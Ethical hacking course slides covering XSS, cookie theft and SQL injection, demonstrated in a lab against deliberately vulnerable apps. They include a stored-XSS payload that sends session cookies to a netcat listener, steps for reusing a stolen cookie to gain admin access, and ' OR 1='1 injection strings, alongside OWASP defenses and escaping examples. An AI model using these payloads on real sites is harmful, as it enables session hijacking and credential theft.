
CIS 76 - Lesson 12

Rich's lesson module checklist

[ ] Slides and lab posted
[ ] WB converted from PowerPoint
[ ] Print out agenda slide and annotate page numbers
[ ] Flash cards
[ ] Properties
[ ] Page numbers
[ ] 1st minute quiz
[ ] Web Calendar summary
[ ] Web book pages
[ ] Commands
[ ] Real test enabled on Canvas
[ ] Test accommodations made
[ ] Lab 10 tested and published
[ ] Backup slides, whiteboard slides, CCC info, handouts on flash drive
[ ] Spare 9v battery for mic
[ ] Key card for classroom door

Last updated 11/15/2017
CIS 76 Ethical Hacking course map (modules): TCP/IP; Evading Network Devices; Cryptography; Network and Computer Attacks; Hacking Wireless Networks; Footprinting and Social Engineering; Hacking Web Servers; Port Scanning; Embedded Operating Systems; Enumeration; Desktop and Server Vulnerabilities; Scripting and Programming

Student Learner Outcomes

1. Defend a computer and a LAN against a variety of different types of security attacks using a number of hands-on techniques.

2. Defend a computer and a LAN against a variety of different types of security attacks using a number of hands-on techniques.
Introductions and Credits

Rich Simms
• HP Alumnus.
• Started teaching in 2008 when Jim Griffin went on sabbatical.
• Rich's site: http://simms-teach.com

And thanks to:

• Steven Bolt for his WASTC EH training.
• Kevin Vaccaro for his CSSIA EH training and Netlab+ pods.
• EC-Council for their online self-paced CEH v9 course.
• Sam Bowne for his WASTC seminars, textbook recommendation and fantastic EH website (https://samsclass.info/).
• Lisa Bock for her great lynda.com EH course.
• John Govsky for many teaching best practices: e.g. the First Minute quizzes, the online forum, and the point grading system (http://teacherjohn.com/).
• Google for everything else!
Student checklist for attending class

1. Browse to: http://simms-teach.com
2. Click the CIS 76 link.
3. Click the Calendar link.
4. Locate today's lesson.
5. Find the Presentation slides for the lesson and download for easier viewing.
6. Click the Enter virtual classroom link to join CCC Confer.
7. Log into Opus-II with Putty or the ssh command.

Note: Blackboard Collaborate Launcher only needs to be installed once. It has already been downloaded and installed on the classroom PCs.
Student checklist for suggested screen layout

[ ] Google
[ ] CCC Confer
[ ] Downloaded PDF of Lesson Slides
[ ] One or more login sessions to Opus-II
[ ] CIS 76 website Calendar page
Student checklist for sharing desktop with classmates

1) Instructor gives you sharing privileges.
2) Click overlapping rectangles icon. If white "Start Sharing" text is present then click it as well.
3) Click OK button.
4) Select "Share desktop" and click Share button.
Rich's CCC Confer checklist - setup

[ ] Preload White Board
[ ] Connect session to Teleconference (session now connected to teleconference)
[ ] Is recording on? (red dot means recording)
[ ] Use teleconferencing, not mic (should change from phone handset icon to little Microphone icon and the "Teleconferencing …" message displayed; mic should be grayed out)
Rich's CCC Confer checklist - screen layout

[ ] layout and share apps: foxit for slides, chrome, vSphere Client, putty
Rich's CCC Confer checklist - webcam setup

[ ] Video (webcam)
[ ] Make Video Follow Moderator Focus
Rich's CCC Confer checklist - Elmo

The "rotate image" button is necessary if you use both the side table and the white board. Quite interesting that they consider you to be an "expert" in order to use this button!

(Screenshots: Elmo rotated down to view side table; Elmo rotated up to view white board; rotate image button)

Run and share the Image Mate program just as you would any other app with CCC Confer.
Rich's CCC Confer checklist - universal fixes

Universal Fix for CCC Confer:

1) Shrink (500 MB) and delete Java cache
2) Uninstall and reinstall latest Java runtime
3) http://www.cccconfer.org/support/technicalSupport.aspx

(Screenshots: Control Panel (small icons) > General Tab > Settings… > 500MB cache size > Delete these; Google "Java download")
Start
Sound Check

Students that dial-in should mute their line using *6 to prevent unintended noises distracting the web conference.

Instructor can use *96 to mute all student lines.

Volume
*4 - increase conference volume.
*7 - decrease conference volume.
*5 - increase your voice volume.
*8 - decrease your voice volume.
Instructor: Rich Simms

Dial-in: 888-886-3951
Passcode: 136690

Philip Bruce Tre Sam B. Sam R. Miguel Bobby Garrett Ryan A.

Aga Karina Chris Tanner Helen Xu Mariano Cameron Ryan M.

May Karl-Heinz Remy

Email me ([email protected]) a relatively current photo of your face for 3 points extra credit
First Minute Quiz

Please answer these questions in the order shown:

For credit email answers to: [email protected] within the first few minutes of the live class
Hacking Web Servers

Objectives
• Look at vulnerabilities in web applications
• Look at exploits used against web applications
• Look at how to protect web applications

Agenda
• Quiz #9
• Questions
• In the news
• Best practices
• Housekeeping
• Web applications
• OWASP Top 10
• A3 cross-site scripting (XSS)
• Reflected cross-site scripting (XSS)
• Stored cross-site scripting (XSS)
• Stealing cookies with XSS
• A1 SQL Injection
• A8 Cross-Site Request Forgery
• Assignment
• Wrap up
Admonition

Unauthorized hacking is a crime.

The hacking methods and activities learned in this course can result in prison terms, large fines and lawsuits if used in an unethical manner. They may only be used in a lawful manner on equipment you own or where you have explicit permission from the owner.

Students that engage in any unethical, unauthorized or illegal hacking may be dropped from the course and will receive no legal protection or help from the instructor or the college.
Questions

How does this course work?

Past lesson material?

Previous labs?

Chinese proverb (他問一個問題,五分鐘是個傻子,他不問一個問題仍然是一個傻瓜永遠。): He who asks a question is a fool for five minutes; he who does not ask a question remains a fool forever.
In the news
Previous Term News

Drone hacks room of smart light bulbs
http://www.theverge.com/2016/11/3/13507126/iot-drone-hack

• Researchers demonstrated infecting one Hue light with a virus that spreads from lamp to lamp.
• The lights did not have to be on the same private network to get infected.
• The researchers did not need physical access to the lights.
• The infected lights blinked SOS in Morse code.
Previous Term News

This AI Bot That Messes With Email Scammers As Long As Possible Is Brilliant
Digg Nov 8 2017, 12:20 PM
http://digg.com/2017/re-scam-ai-scammer

"Re:scam can take on multiple personas, imitating real human tendencies with humour and grammatical errors, and can engage with infinite scammers all at once, meaning it can continue any email conversation for as long as possible. Re:scam will now turn the tables on the scammers by wasting their time, and ultimately damage the profits for scammers..."
Previous Term News

The Twitter Bot That Sounds Just Like Me
KAVEH WADDELL AUG 18, 2016 The Atlantic
https://www.theatlantic.com/technology/archive/2016/08/the-twitter-bot-that-sounds-just-like-me/496340/

"Hackers can use artificial intelligence to mimic their targets' tweets—and entice them to click on malicious links."

"SNAP_R's average success rate was about 30 percent. That's far better than the usual success rate with automated phishing, which is between 5 and 15 percent, "
Recent News

Phishing helps hackers hijack accounts, says Google study
BBC News 10 November 2017
http://www.bbc.com/news/technology-41940838

"Cyber-thieves grab almost 250,000 valid log-in names and passwords for Google accounts every week, suggests research."

'During the 12 months studying the underground markets, the researchers identified more than 788,000 credentials stolen via keyloggers, 12 million grabbed via phishing and 1.9 billion from breaches at other companies.'
Recent News

Data Breaches, Phishing, or Malware? Understanding the Risks of Stolen Credentials
Joint study between Google and UC Berkeley
https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/46437.pdf
Best Practices
Secure your router

1. Change your default username and password.
2. If you specifically don't need Universal Plug and Play (UPnP) then disable it.
3. Turn off remote management (requires physical access).
4. Change the name of your access point.
5. Require a password for your WiFi connection.
6. Update the firmware on your router and IoT devices.
7. Research your purchases.
8. Read reviews.
9. Check for known vulnerabilities.
10. Peruse vendor's website.

http://www.welivesecurity.com/2016/11/08/secure-router-help-prevent-next-internet-takedown/
Housekeeping

1. Lab 9 due 11:59PM tonight.
2. Five more posts due 11:59PM tonight.
Housekeeping

Last Withdraw: 11/18/17

Students who are no longer participating in the class (turning in assignments, posting on the forum, taking quizzes or tests) may be dropped by the instructor.
The final project specifications are now available.

The final project is due on the Lesson 15 day.

https://simms-teach.com/docs/cis76/cis76final-project.pdf
Lots and lots of project ideas

Awesome-Hacking project list
https://github.com/Hack-with-Github/Awesome-Hacking

Awesome Repositories: Awesome InfoSec, Awesome AppSec, Awesome Bug Bounty, Awesome CTF, Awesome DevSecOps, Awesome Exploit Development, Awesome Fuzzing, Awesome Hacking One, Awesome Honeypots, Awesome Incident Response, Awesome Static Analysis, Awesome IoT Hacks, Awesome Malware Analysis, Awesome Pcaptools, Awesome Pentest, Awesome PHP Security, Awesome Reversing, Awesome Sec Talks, Awesome SecLists, Awesome Security, Awesome Threat Intelligence, Awesome Vehicle Security, Awesome Web Hacking, Awesome Windows Exploitation, Awesome WiFi Arsenal, Awesome Android Security, Awesome OSX and iOS Security
Heads up on Final Exam

Test #3 (final exam) is TUESDAY Dec 12 4-6:50PM

Extra credit labs and final posts due Tue by 11:59PM

• All students will take the test at the same time. The test must be completed by 6:50PM.
• Working and long distance students can take the test online via CCC Confer and Canvas.
• Working students will need to plan ahead to arrange time off from work for the test.
• Test #3 is mandatory (even if you have all the points you want)
Where to find your grades

Send me your survey to get your LOR code name.

The CIS 76 website Grades page: http://simms-teach.com/cis76grades.php

Or check on Opus-II:
checkgrades codename
(where codename is your LOR codename)

Written by Jesse Warren, a past CIS 90 alumnus.

To run checkgrades update your path in .bash_profile with:
PATH=$PATH:/home/cis76/bin

Points that could have been earned:
8 quizzes: 24 points
8 labs: 240 points
2 tests: 60 points
2 forum quarters: 40 points
Total: 364 points

At the end of the term I'll add up all your points and assign you a grade using this table.
Web Applications
Web Servers and Browsers

<!DOCTYPE html>
<html>
<head>
<title>Cylons Rule</title>
</head>
<body>
<h1>Cylon Recruiting Center</h1>
<img src="images/cylon.gif" alt="Cylon">
<p>All IoT devices on earth are welcome!</p>
<!-- credit: https://media.giphy.com/media/MzLGnFfhq7gly/giphy.gif -->
<p>Join us at our next meeting on Caprica 6.</p>
</body>
</html>

(Web page rendered by the browser)

Web Server (Apache, Microsoft IIS, nginx, etc.) <--- HTTP / HTTPS over the Internet ---> Client Browser (Chrome, IE, Safari, Firefox, etc.)

Static web pages
• Created using HTML

Dynamic web pages
• Forms
• PHP
• Active Server Pages (ASP)
• Javascript
• More ...
Total number of websites; market share of active sites; market share of the top million busiest sites (charts from the Netcraft October 2017 web server survey):
https://news.netcraft.com/archives/2017/10/26/october-2017-web-server-survey-13.html
OWASP Top Ten
Open Web Application Security Project (OWASP)

https://www.owasp.org/index.php/Main_Page

Core Purpose
"Be the thriving global community that drives visibility and evolution in the safety and security of the world's software."
Open Web Application Security Project (OWASP)

2013 Top 10 Web Application Security Flaws:

• A1 Injection
• A2 Broken Authentication and Session Management
• A3 Cross-Site Scripting (XSS)
• A4 Insecure Direct Object References
• A5 Security Misconfiguration
• A6 Sensitive Data Exposure
• A7 Missing Function Level Access Control
• A8 Cross-Site Request Forgery (CSRF)
• A9 Using Components with Known Vulnerabilities
• A10 Unvalidated Redirects and Forwards

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=OWASP_Top_10_for_2013
OWASP Top 10

A1-Injection
Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

A2-Broken Authentication and Session Management
Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities.

A3-Cross-Site Scripting (XSS)
XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim's browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

A4-Insecure Direct Object References
A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.

A5-Security Misconfiguration
Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. Secure settings should be defined, implemented, and maintained, as defaults are often insecure. Additionally, software should be kept up to date.

A6-Sensitive Data Exposure
Many web applications do not properly protect sensitive data, such as credit cards, tax IDs, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.

A7-Missing Function Level Access Control
Most web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access functionality without proper authorization.

A8-Cross-Site Request Forgery (CSRF)
A CSRF attack forces a logged-on victim's browser to send a forged HTTP request, including the victim's session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim's browser to generate requests the vulnerable application thinks are legitimate requests from the victim.

A9-Using Components with Known Vulnerabilities
Components, such as libraries, frameworks, and other software modules, almost always run with full privileges. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications using components with known vulnerabilities may undermine application defenses and enable a range of possible attacks and impacts.

A10-Unvalidated Redirects and Forwards
Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.

https://www.owasp.org/index.php/Top_10_2013-Top_10
Open Web Application Security Project (OWASP)

OWASP Risk Rating Methodology
https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013.pdf
A3 Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)

OWASP Risk Rating
https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)
Cross-Site Scripting (XSS)

https://www.youtube.com/watch?v=L5l9lSnNMxg
OWASP Cross Site Scripting Prevention Cheat Sheet

How Do I Prevent 'Cross-Site Scripting (XSS)'?

Preventing XSS requires separation of untrusted data from active browser content.
1. The preferred option is to properly escape all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. See the OWASP XSS Prevention Cheat Sheet for details on the required data escaping techniques.
2. Positive or "whitelist" server-side input validation is also recommended as it helps protect against XSS, but is not a complete defense as many applications require special characters in their input. Such validation should, as much as possible, validate the length, characters, format, and business rules on that data before accepting the input.
3. For rich content, consider auto-sanitization libraries like OWASP's AntiSamy or the Java HTML Sanitizer Project.
4. Consider Content Security Policy (CSP) to defend against XSS across your entire site.

https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)
Reflected Cross-Site Scripting (XSS) Example
Reflected Cross-Site Scripting (XSS)

• Non-persistent because nothing is stored in a database.
• Malicious JavaScript is fed into a web page that displays whatever the user entered.
• Malicious Javascript can be inserted into a URL that is then emailed to the victim.

https://en.wikipedia.org/wiki/Cross-site_scripting
Reflected XSS Example Reference and Credit

https://www.youtube.com/watch?v=dFci82qwXA0

Excellent set of tutorials on XSS
Reflected Cross-Site Scripting (XSS)

Example Overview:

We will use a simple form webpage on EH-OWASP-xx to simulate how reflected cross-site scripting can feed malicious code into a form that will then be executed by the browser.

The user/attacker will browse from EH-WinXP to the EH-OWASP web server.
Reflected Cross-Site Scripting (XSS) Example

As root on your EH-OWASP VM:

cd /var/www
mkdir lesson12
cd lesson12/
mkdir xss01
cd xss01/
scp xxxxxx76@opus-ii:/home/cis76/depot/lesson12/xss01/* .
(Copy the DRAPS TV index.php file to your OWASP VM)

chmod 644 index.php
service apache2 status
(We want to publish this page via the Apache web server)

vi index.php
(View the web page, which contains HTML and PHP code.)
Reflected Cross-Site Scripting (XSS) Example

root@owaspbwa:/var/www/lesson12/xss01# cat index.php
<!DOCTYPE html>
<html>
<!-- Credit: DrapsTV at https://www.youtube.com/watch?v=dFci82qwXA0 -->
<title> XSS Tutorial #2 </title>
<body>
<h1 align="center"> Try My New Search Feature! </h1>
<table align="center">
<tr><td>
<form action="index.php" method="get">
<input type="text" name="search" placeholder="search" />
<input type="submit" value="Search" />
</form>
</td></tr>
</table>
<br />
<br />
<p align="center">
<?php
if(isset($_GET["search"]))
{
echo "The results of your search for: ".$_GET["search"];
echo "<br /><br /> <i>Sorry No Results Found! </i>";
}
?>
</p>
<h3 align="center"> This website was made by me! I hope you really really like it! </h3>
</body>
</html>
root@owaspbwa:/var/www/lesson12/xss01#

The web page has a one field web form and a submit button. Form data is sent in the URL via the HTTP GET method, and the PHP echoes $_GET["search"] straight back into the page.
Reflected Cross-Site Scripting (XSS) Example

From your WinXP VM, browse to the new website on your OWASP VM:
[WinXP] http://10.76.xx.101/lesson12/xss01/index.php

Search for: Star Wars
http://10.76.xx.101/lesson12/xss01/index.php?search=Star+Wars

Search for: <font color="green">
http://10.76.xx.101/lesson12/xss01/index.php?search=%3Cfont+color%3D%22green%22%3E

Encoding used:
%3C is <
%3D is =
%22 is "
%3E is >

Manually edit the URL at the top of the webpage, changing green to red:
http://10.76.xx.101/lesson12/xss01/index.php?search=%3Cfont+color%3D%22red%22%3E

Copy and paste the URL into a different browser (Firefox, Internet Explorer) and the JavaScript is still executed:
http://10.76.xx.101/lesson12/xss01/index.php?search=%3Cfont+color%3D%22red%22%3E

Note that a tampered URL could be emailed to another user to click on.

Search for: <script>alert("You've been hacked!")</script>
http://10.76.xx.101/lesson12/xss01/index.php?search=Uh+Oh%3Cscript%3Ealert%28%22You%27ve+been+hacked%21%22%29%3C%2Fscript%3E
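The vulnerable echo from index.php beside its escaped form, as an added example that is not code from the lesson's lab files or the DrapsTV tutorial; it applies rule 1 of the OWASP cheat sheet above (escape untrusted data for the HTML body context) and checks access-log lines for the three searches used in this example. Python models the PHP behaviour; the access-log lines and the 10.76.xx.102 client address are constructed.

```python
"""Reflected XSS in index.php: the vulnerable echo beside its escaped form,
plus a check over access-log lines for the searches used in this lesson.

Added example, not code from the DrapsTV tutorial or the CIS 76 lab files.
It models in Python what index.php does with $_GET["search"]; the host
10.76.xx.101 is the lesson's pod placeholder and the log lines are constructed.
"""
import html
import re
from urllib.parse import parse_qs, urlsplit

TAIL = "<br /><br /> <i>Sorry No Results Found! </i>"


def search_param(url: str) -> str:
    """Decode the 'search' query parameter the way PHP fills $_GET["search"]
    (percent-decoding, '+' to space); '' if the parameter is absent."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return query.get("search", [""])[0]


def render_vulnerable(search: str) -> str:
    """What index.php emits: echo "The results of your search for: ".$_GET["search"];
    The untrusted value lands in the HTML body unchanged, so a <font> or <script>
    tag in it is parsed by the browser as markup."""
    return "The results of your search for: " + search + TAIL


def render_escaped(search: str) -> str:
    """Hardened form: escape for the HTML body context before concatenating,
    the equivalent of htmlspecialchars($_GET["search"], ENT_QUOTES, 'UTF-8') in PHP.
    The browser then displays the literal characters instead of parsing them."""
    return "The results of your search for: " + html.escape(search, quote=True) + TAIL


# Constructed Apache-style access log lines replaying the lesson's three searches.
ACCESS_LOG = """\
10.76.xx.102 - - [15/Nov/2017:18:02:11 -0800] "GET /lesson12/xss01/index.php?search=Star+Wars HTTP/1.1" 200 812
10.76.xx.102 - - [15/Nov/2017:18:03:40 -0800] "GET /lesson12/xss01/index.php?search=%3Cfont+color%3D%22green%22%3E HTTP/1.1" 200 812
10.76.xx.102 - - [15/Nov/2017:18:05:07 -0800] "GET /lesson12/xss01/index.php?search=Uh+Oh%3Cscript%3Ealert%28%22You%27ve+been+hacked%21%22%29%3C%2Fscript%3E HTTP/1.1" 200 870
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
TAG_RE = re.compile(r"<\s*/?[a-zA-Z]")  # start of an HTML tag, after decoding


def flag_markup_searches(log_text: str) -> list:
    """Return the decoded search terms that contain HTML markup. Decoding first
    matters: the raw log line only shows %3Cscript%3E, never '<script>'."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        term = search_param(match.group(1))
        if TAG_RE.search(term):
            hits.append(term)
    return hits


if __name__ == "__main__":
    url = "http://10.76.xx.101/lesson12/xss01/index.php?search=%3Cfont+color%3D%22green%22%3E"
    term = search_param(url)
    print("decoded   :", term)
    print("vulnerable:", render_vulnerable(term))
    print("escaped   :", render_escaped(term))
    print("flagged   :", flag_markup_searches(ACCESS_LOG))
```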
Activity

Search for:

<img src="http://www.simms-teach.com/images/b.jpg"></img>

Put who you see in the search results in the chat window
Stored Cross-Site Scripting (XSS) Example
Stored Cross-Site Scripting (XSS)

• The attacker uses the web application to post content containing <script> tags full of malicious JavaScript code.
• Later when the victim reads the posted content their browser will execute the malicious script.
• Persistent because the malicious code is stored in the web application database.

https://en.wikipedia.org/wiki/Cross-site_scripting
Stored XSS Example Reference and Credit

http://10.76.xx.101/WebGoat/source?solution=true

Solution page on OWASP VM website
Stored Cross-Site Scripting (XSS)

Example Overview:

We will use WebGoat on EH-OWASP-xx to simulate how an attacker can use cross-site scripting to insert malicious code into content for a forum-like web application. In this case the malicious code stored in the database will display an annoying "Mu Ha Ha Ha" message.

Any victims that read the infected message post will get the annoying message.

The attacker/victim will browse from EH-WinXP to the EH-OWASP web server.
Stored Cross-Site Scripting (XSS) Example

From your WinXP VM, browse to your OWASP VM and head to WebGoat (scroll down a little). We are using Pod 5 for this example.
[WinXP] http://10.76.xx.101

Login to WebGoat with both username and password = guest
http://10.76.xx.101

Start OWASP WebGoat Training
http://10.76.xx.101/WebGoat/attack

Navigate to Stored XSS Attacks on left panel
http://10.76.xx.101/WebGoat/attack?Screen=374&menu=900

Add first message (the screenshot uses "New extra credit lab available"). The first message is then listed; add a second message.

Previously added messages are listed. Add a third, malicious message, using javascript:
<script language="javascript" type="text/javascript">alert("Mu Ha Ha Ha");</script>
Also in the file /home/cis76/depot/lesson12/xss02/code.txt on Opus-II

Select a "good" message from Message list to retrieve from the database. The message contents are displayed.

Next select the malicious message from Message list to retrieve from the database.

When the malicious message is retrieved the stored javascript is executed.
Stealing Cookies with XSS (work in progress)
Stealing Cookies with XSS

https://www.youtube.com/watch?v=T1QEs3mdJoc
Cookie Stealing Example Reference and Credit

https://www.youtube.com/watch?v=3tRSJwuDBKg

http://danscourses.com/xss-with-a-vulnerable-webapp/

Excellent tutorial on stealing a cookie
Stealing Cookies with XSS

Example Overview:

For this example we will use the DVWA web app on the EH-OWASP VM to show how XSS commands can be used to steal a session cookie.

The attacker on EH-Kali will login to the DVWA app adding a post with a malicious script that steals the current cookie and sends it to a netcat listener on EH-Kali.

The victim on EH-WinXP next logs into the DVWA app and views the post which sends the session cookie to the attacker.

The attacker on EH-Kali uses a Firefox add-on called Tamper Data to use the cookie to login as the victim without entering a username and password!
Stealing Cookies with XSS

OWASP Setup

Login as root
cd /var/www/dvwa/vulnerabilities/xss_s/
vi index.php
On line 49 modify maxlength=\"50\" to maxlength=\"200\"

This modification will let us enter more than 50 characters into the Message field on this DVWA form.
Stealing Cookies with XSS

Kali Setup

Login as root
1. Start in Workspace 1
2. Run Firefox, search for the Tamper Data Add-On and install it.
3. Restart Firefox
4. Pancakes stack icon > Customize > Show/Hide Toolbars button > Check Menu Bar
5. Open a terminal in Workspace 2
6. systemctl stop apache2
CIS 76 - Lesson 12

Stealing Cookies with XSS

[Kali] http://10.76.xx.101/

Attacker browses to the OWASP VM in your pod 105


CIS 76 - Lesson 12

Stealing Cookies with XSS

[Kali] http://10.76.xx.101/

Scroll down and click on the Damn Vulnerable Web Application 106
CIS 76 - Lesson 12

Stealing Cookies with XSS

[Kali] http://10.76.xx.101/dvwa/login.php

Login with username and password = admin 107


CIS 76 - Lesson 12

Stealing Cookies with XSS

[Kali] http://10.76.xx.101/dvwa/index.php

Click on Setup
108
CIS 76 - Lesson 12

Stealing Cookies with XSS

[Kali] http://10.76.xx.101/dvwa/setup.php

Click on Create / Reset Database


109
CIS 76 - Lesson 12

Stealing Cookies with XSS

[Kali] http://10.76.xx.101/dvwa/index.php

Click on XSS Stored



Stealing Cookies with XSS

[Kali] http://10.76.xx.101/dvwa/vulnerabilities/xss_s/

Mu Ha Ha

<script>new Image().src="http://10.76.xx.150/bogus.php?"+document.cookie;</script>

To lay the trap, fill in the form and click the Sign Guestbook button

Stealing Cookies with XSS

[Kali] http://10.76.xx.101/dvwa/vulnerabilities/xss_s/

Log out for now

Stealing Cookies with XSS

[Kali] http://10.76.xx.101/dvwa/vulnerabilities/xss_s/

Attacker logs out for now

Stealing Cookies with XSS

[WinXP] http://10.76.xx.101

The victim browses to the OWASP VM

Stealing Cookies with XSS

[WinXP] http://10.76.xx.101

Scroll down and select Damn Vulnerable Web Application

Stealing Cookies with XSS

[WinXP] http://10.76.xx.101

Login with username and password = admin

Stealing Cookies with XSS

[WinXP] http://10.76.xx.101/dvwa/index.php

Switch back to Kali for the next step

Stealing Cookies with XSS

[Kali] netcat -lvp 80

Start listening for incoming HTTP traffic on port 80

Stealing Cookies with XSS

[WinXP] http://10.76.xx.101/dvwa/index.php

Victim clicks on XSS Stored

Stealing Cookies with XSS

[WinXP] http://10.76.xx.101/dvwa/vulnerabilities/xss_s/

When the browser renders this page the malicious script is executed

Stealing Cookies with XSS

[Kali] netcat -lvp 80

security=low;%20PHPSESSID=chhba9fpi8m1pcapu08g0t2mp5;%20acope
ndivids=swingset,jotto,phpbb2,redmine;%20acgroupswithpersist=nada

The attacker can now see and copy the victim's session cookie

Stealing Cookies with XSS

[Kali] Run the Tamper Data tool

On Firefox run the Tamper Data tool


http://10.76.xx.101/dvwa/vulnerabilities/xss_s/

Start tampering, update the URL then press Enter (do not click the Login button)

Click the Tamper button

Locate the Cookie field

Replace your cookie with the victim's cookie

Don't include the "GET", the requested website page (bogus.php) or the trailing "HTTP/1.1"

Voila! We have "logged in" using the victim's session cookie

And we have full admin rights
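To see the defensive side of the walkthrough above, here is an added Python example (not part of the lesson or of DVWA) that reproduces the stored-XSS rendering bug in a small function, shows the output-encoding fix, and issues the session cookie with the HttpOnly flag so document.cookie cannot hand it to the listener. The renderer functions, the constructed guestbook entry and the sample session id are assumptions made for illustration.

```python
import html
from http.cookies import SimpleCookie

# Constructed guestbook entry: the same shape of payload the DVWA walkthrough
# above stores in the Message field (10.76.xx.150 is the lab's Kali listener).
MALICIOUS_MESSAGE = (
    '<script>new Image().src="http://10.76.xx.150/bogus.php?"'
    '+document.cookie;</script>'
)


def render_entry_vulnerable(name, message):
    """Stored-XSS bug as in xss_s/index.php: input is inlined into the page
    unchanged, so the stored <script> runs in every visitor's browser."""
    return f"<div class='entry'><b>{name}</b>: {message}</div>"


def render_entry_safe(name, message):
    """Fix: HTML-encode at output time. '<' becomes '&lt;' and '"' becomes
    '&quot;', so the stored text is displayed literally instead of executed."""
    return (f"<div class='entry'><b>{html.escape(name)}</b>: "
            f"{html.escape(message)}</div>")


def has_live_script(rendered_html):
    """Simple check: is there a real <script> element in the rendered HTML?"""
    return "<script" in rendered_html.lower()


def session_cookie_header(session_id, http_only=True):
    """Second layer: issue PHPSESSID with the HttpOnly flag. A script that
    does manage to run then cannot read it through document.cookie, so the
    netcat listener on port 80 would receive nothing useful."""
    jar = SimpleCookie()
    jar["PHPSESSID"] = session_id
    jar["PHPSESSID"]["path"] = "/"
    jar["PHPSESSID"]["httponly"] = http_only
    return jar.output(header="Set-Cookie:")


if __name__ == "__main__":
    for renderer in (render_entry_vulnerable, render_entry_safe):
        page = renderer("Mu Ha Ha", MALICIOUS_MESSAGE)
        print(f"{renderer.__name__}: live script = {has_live_script(page)}")
    # Sample session id taken from the captured cookie shown in the lesson.
    print(session_cookie_header("chhba9fpi8m1pcapu08g0t2mp5"))
```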
A1 Injection (SQL)

SQL Injection

• Used to attack web applications that store data in a SQL
database.

• Malicious SQL statements are inserted into input fields of
web forms that when executed can bypass authentication,
dump database contents, tamper with data, or delete
tables in the database.

https://en.wikipedia.org/wiki/SQL_injection

https://www.owasp.org/index.php/SQL_Injection

Injection

OWASP Risk Rating

https://www.owasp.org/index.php/Top_10_2013-A1-Injection

SQL Injection

https://www.youtube.com/watch?v=_jKylhJtPmI

Time 8:33

OWASP Injection Prevention

How Do I Prevent 'Injection'?


Preventing injection requires keeping untrusted data separate from
commands and queries.

1. The preferred option is to use a safe API which avoids the use of
the interpreter entirely or provides a parameterized interface. Be
careful with APIs, such as stored procedures, that are
parameterized, but can still introduce injection under the hood.
2. If a parameterized API is not available, you should carefully
escape special characters using the specific escape syntax for
that interpreter. OWASP’s ESAPI provides many of these escaping
routines.
3. Positive or "white list" input validation is also recommended, but
is not a complete defense as many applications require special
characters in their input. If special characters are required, only
approaches 1. and 2. above will make their use safe. OWASP’s
ESAPI has an extensible library of white list input validation
routines.

https://www.owasp.org/index.php/Top_10_2013-A1-Injection

SQL Injection Example Reference and Credit

https://www.youtube.com/watch?v=RtN8tlR7q-M

Excellent tutorial on SQL Injection using Mutillidae

SQL Injection

Example Overview:

For this example we will use Mutillidae II on the EH-OWASP VM
to show how SQL commands can be injected into a web
application. The web application does not check and sanitize the
input, so anything added will get executed as a SQL query.

The attacker will browse from EH-Kali to the web server on the
EH-OWASP VM.

The EH-Kali browser does not use the Burp Suite proxy in this
example, so the proxy configuration from the last example can be
undone ("Pancakes" icon > Preferences > Advanced > Network
> Settings... > Select "No proxy").

OWASP Mutillidae II

[EH-Kali] http://10.76.xx.101

Disable web proxy if configured

On your Kali VM, browse to your OWASP VM and head to Mutillidae II

OWASP Mutillidae II

Select OWASP 2013 on the left panel

OWASP Mutillidae II

OWASP 2013 > A1 Injection (SQL) > SQLi - Extract Data > User Info (SQL)

Keep selecting till you get to User Info (SQL)

OWASP Mutillidae II

Click the link to register a new account for yourself

OWASP Mutillidae II

Add a username and password of your choice and any text for the signature

OWASP Mutillidae II

Account has been created

OWASP Mutillidae II

Now that we have created a new user, let's start over and log in

OWASP Mutillidae II

Login using your new account

OWASP Mutillidae II

If successful your account details will be displayed below

OWASP Mutillidae II

To run a text editor on Kali:
Applications > Usual applications > Accessories > Text Editor

Record the URL in a text editor so you can examine the fields

OWASP Mutillidae II

Tamper with the password portion of the URL to see if you can get an error

OWASP Mutillidae II
single quote added

Fix the password and add a single quote after it. Try it and observe what happens.

OWASP Mutillidae II

Scroll down to see the full error message

Lots of useful information is shown. Log the URL and SQL query in the text editor

OWASP Mutillidae II

What happens if we use a password of: ' OR 1='1

OWASP Mutillidae II

That results in a SQL query that dumps all the data in the database!

OWASP Mutillidae II

simben76' OR 1='1
You can now login without a password!

OWASP Mutillidae II

' OR 1='1
Or all users and passwords in the database!
